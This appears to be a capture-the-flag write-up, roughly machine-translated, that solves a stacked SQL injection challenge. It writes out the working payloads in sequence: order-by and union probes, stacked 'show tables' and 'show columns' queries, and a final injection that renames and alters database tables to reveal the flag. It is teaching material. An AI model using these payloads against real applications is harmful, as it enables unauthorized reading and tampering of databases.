A. Look at the subject should be relevant and sql injection
1 into the experimental environment, an input block is found, try to determine what exists sql injection, enter '
The error information may be known to exist sql injection, then the routine operation, determines the number of fields of inquiry 'order by 2 #, page display normal
When 'order by # 3, the error was found, the query determines the number of fields is thus 2.
Joint inquiry by the union see if I can point groan useful information, 'union select version (), 1 #, according to the results show, the back end should be filtered out gave keyword
Then we can try stacking inject 1 '; show databases; # to query the entire database
Discovery succeeds, the query again all the table names, 1 '; show tables; #
Based on the results returned We found 1919810931114514 table suspicious.
In order to prove our guess, try to see the existence of this table which fields
By 1 '; show columns from `1919810931114514`; # table called numbers here, we use a keyboard that is left of the number 1 above a backtick
We certainly see that flag to flag in this table inside, and now is to check out.
There are only two tables, we enter a query that the results should come from the words table 1, we can pass 1 'or 1 = 1 #,
Find out all the information in this table, so the idea here is that by 1919810931114514 table name was changed to words
Then you can check all the information in this table.
';rename tables words to words1;rename tables `1919810931114514` to words; alter table words change flag id varchar(100);#
By 1 'or 1 = 1 #, derived flag.